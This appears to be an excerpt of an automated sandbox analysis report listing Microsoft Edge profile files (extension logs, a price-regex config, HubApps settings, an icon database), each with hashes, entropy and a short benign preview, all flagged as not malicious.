                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3246181074482
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rc:C1gAg1zfvU
                                                                                                                                                                                                                                                                                                  MD5:0B9FF85DAE00EB0CBEE7C00430F37132
                                                                                                                                                                                                                                                                                                  SHA1:B24982D06049CCB31F9CD65EEA418AB0B4452034
                                                                                                                                                                                                                                                                                                  SHA-256:06EB7A8A0E0800178CFF4696936F1C3838BCD0EE506AA338B589A141872D967E
                                                                                                                                                                                                                                                                                                  SHA-512:73023ED379236554661C7A5A6C9C952720D2F9C6924DBF2698F9A294A0B29F2EF23B82D6A757139A99F8D084CD97CA40784A4225798A63652F9437CEF006DFCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.029753789302956
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:c134q2P923oH+Tcwt8aPrqIFUt8yTJZmw+yTDkwO923oH+Tcwt8amLJ:c+v4YebL3FUt86/+G5LYebQJ
                                                                                                                                                                                                                                                                                                  MD5:564E0B19E4B17424A5031551ABBD7E0B
                                                                                                                                                                                                                                                                                                  SHA1:1D20D77BF2E4179597BFA7053C1FFC592625D540
                                                                                                                                                                                                                                                                                                  SHA-256:1C8057920F53B346D2AC7604061008CD078D8982E0DFAB714A9B065821269C29
                                                                                                                                                                                                                                                                                                  SHA-512:B015CBAB41A59DE2D2218C7466A44F4C227AD736461D92951A068BA8E82A807936094C5636A2CB8D119FE37DD07E573301828386D9138076501A3F1EA8C21B66
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.011 1c44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-00:24:20.012 1c44 Recovering log #3.2024/12/23-00:24:20.012 1c44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.029753789302956
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:c134q2P923oH+Tcwt8aPrqIFUt8yTJZmw+yTDkwO923oH+Tcwt8amLJ:c+v4YebL3FUt86/+G5LYebQJ
                                                                                                                                                                                                                                                                                                  MD5:564E0B19E4B17424A5031551ABBD7E0B
                                                                                                                                                                                                                                                                                                  SHA1:1D20D77BF2E4179597BFA7053C1FFC592625D540
                                                                                                                                                                                                                                                                                                  SHA-256:1C8057920F53B346D2AC7604061008CD078D8982E0DFAB714A9B065821269C29
                                                                                                                                                                                                                                                                                                  SHA-512:B015CBAB41A59DE2D2218C7466A44F4C227AD736461D92951A068BA8E82A807936094C5636A2CB8D119FE37DD07E573301828386D9138076501A3F1EA8C21B66
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.011 1c44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/23-00:24:20.012 1c44 Recovering log #3.2024/12/23-00:24:20.012 1c44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077116687614254
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:ZUq3+q2P923oH+Tcwt865IFUt8tZmw+xVkwO923oH+Tcwt86+ULJ:qq3+v4Yeb/WFUt8t/+xV5LYeb/+SJ
                                                                                                                                                                                                                                                                                                  MD5:D709792AC9E72E46D4EDFE6F9674C277
                                                                                                                                                                                                                                                                                                  SHA1:D45085B606DBA7F6FCC57D2C6112D8E1F38DB50E
                                                                                                                                                                                                                                                                                                  SHA-256:B828D088F0EE6F20ED75BAB70726C4544BA4274DCF31DF9612DCEF0FD7C3987A
                                                                                                                                                                                                                                                                                                  SHA-512:A5A9DD988CECD0961CBF14F94677820C20605CEC5446D26F0439C855A1E84E043AD9EFD4E3CF277C56A926D2BF99B7BA176FBDFC99DEC7E6CA566A445E3EF2EF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.101 1abc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-00:24:20.113 1abc Recovering log #3.2024/12/23-00:24:20.113 1abc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077116687614254
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:ZUq3+q2P923oH+Tcwt865IFUt8tZmw+xVkwO923oH+Tcwt86+ULJ:qq3+v4Yeb/WFUt8t/+xV5LYeb/+SJ
                                                                                                                                                                                                                                                                                                  MD5:D709792AC9E72E46D4EDFE6F9674C277
                                                                                                                                                                                                                                                                                                  SHA1:D45085B606DBA7F6FCC57D2C6112D8E1F38DB50E
                                                                                                                                                                                                                                                                                                  SHA-256:B828D088F0EE6F20ED75BAB70726C4544BA4274DCF31DF9612DCEF0FD7C3987A
                                                                                                                                                                                                                                                                                                  SHA-512:A5A9DD988CECD0961CBF14F94677820C20605CEC5446D26F0439C855A1E84E043AD9EFD4E3CF277C56A926D2BF99B7BA176FBDFC99DEC7E6CA566A445E3EF2EF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.101 1abc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/23-00:24:20.113 1abc Recovering log #3.2024/12/23-00:24:20.113 1abc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0980822269681045
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Wt+q2P923oH+Tcwt8NIFUt82MZZmw+2MNVkwO923oH+Tcwt8+eLJ:Hv4YebpFUt8R/+L5LYebqJ
                                                                                                                                                                                                                                                                                                  MD5:35575D150C2AEC3801830519F7126F48
                                                                                                                                                                                                                                                                                                  SHA1:90D780628A8890EE0AFA042CD1A84101934CC2BC
                                                                                                                                                                                                                                                                                                  SHA-256:75A50F6FC1CA57ACC19406175F30DED2790C7B62AC9D0B73F868E2A087CA7913
                                                                                                                                                                                                                                                                                                  SHA-512:E417F926C3017842C8DC055298C5F19275F5848862AC3400C29092DC44A80F5082DEF18CDA5AC2B6275F52AF7AE704587358EBD9253A42AA8FBC211047B5544A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.719 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:24:20.720 1c18 Recovering log #3.2024/12/23-00:24:20.720 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0980822269681045
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Wt+q2P923oH+Tcwt8NIFUt82MZZmw+2MNVkwO923oH+Tcwt8+eLJ:Hv4YebpFUt8R/+L5LYebqJ
                                                                                                                                                                                                                                                                                                  MD5:35575D150C2AEC3801830519F7126F48
                                                                                                                                                                                                                                                                                                  SHA1:90D780628A8890EE0AFA042CD1A84101934CC2BC
                                                                                                                                                                                                                                                                                                  SHA-256:75A50F6FC1CA57ACC19406175F30DED2790C7B62AC9D0B73F868E2A087CA7913
                                                                                                                                                                                                                                                                                                  SHA-512:E417F926C3017842C8DC055298C5F19275F5848862AC3400C29092DC44A80F5082DEF18CDA5AC2B6275F52AF7AE704587358EBD9253A42AA8FBC211047B5544A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:20.719 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/23-00:24:20.720 1c18 Recovering log #3.2024/12/23-00:24:20.720 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6481101165292493
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0tbQkQerkjl5cbP/KbtZ773pL9hCgam6ItRKToaAu:adKe2ml+bP/o7Pv9RKcC
                                                                                                                                                                                                                                                                                                  MD5:FA8EC40ED9F61724A8AAE14F146E8ABC
                                                                                                                                                                                                                                                                                                  SHA1:92BF481BB99EAC8D312AD5998C0B5ADB98B1F827
                                                                                                                                                                                                                                                                                                  SHA-256:2B1B3E6FFBB45D7CC182AFAA2B1DB5E4F7CDF495EC7BAA258C9B2D34B1947497
                                                                                                                                                                                                                                                                                                  SHA-512:8980A828715627BEAECE18A272172C895DC7167A289F73B9664D855AF6A0F8EB3E8225C10F7A6AD5C5D5C5299F12806232C76CD4AC443142C803CEF6517154F8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.269601441885248
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DMyv4Yeb8rcHEZrELFUt89+Z/+9+lR5LYeb8rcHEZrEZSJ:AY4Yeb8nZrExg89ZyDLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                  MD5:1D5303A0006ABB460D69E8DD2243AECD
                                                                                                                                                                                                                                                                                                  SHA1:8F10AC0401CCA15915AAAC8B3407DE51E259801F
                                                                                                                                                                                                                                                                                                  SHA-256:D8D5EF27553678E06993E4DFD14914B470A5D850843453FFA3391AD5EA533A03
                                                                                                                                                                                                                                                                                                  SHA-512:E2A2FDED039E9023CF405AB64456E881AAEB7EF1F35766BA74AFA500D31E4A60C75B35CD6C070E108DCCB6E3A512EEC12978FE9B3E7E07601B8C8643F6DF02E2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.094 1374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-00:24:26.095 1374 Recovering log #3.2024/12/23-00:24:26.095 1374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.269601441885248
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:DMyv4Yeb8rcHEZrELFUt89+Z/+9+lR5LYeb8rcHEZrEZSJ:AY4Yeb8nZrExg89ZyDLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                  MD5:1D5303A0006ABB460D69E8DD2243AECD
                                                                                                                                                                                                                                                                                                  SHA1:8F10AC0401CCA15915AAAC8B3407DE51E259801F
                                                                                                                                                                                                                                                                                                  SHA-256:D8D5EF27553678E06993E4DFD14914B470A5D850843453FFA3391AD5EA533A03
                                                                                                                                                                                                                                                                                                  SHA-512:E2A2FDED039E9023CF405AB64456E881AAEB7EF1F35766BA74AFA500D31E4A60C75B35CD6C070E108DCCB6E3A512EEC12978FE9B3E7E07601B8C8643F6DF02E2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/23-00:24:26.094 1374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/23-00:24:26.095 1374 Recovering log #3.2024/12/23-00:24:26.095 1374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
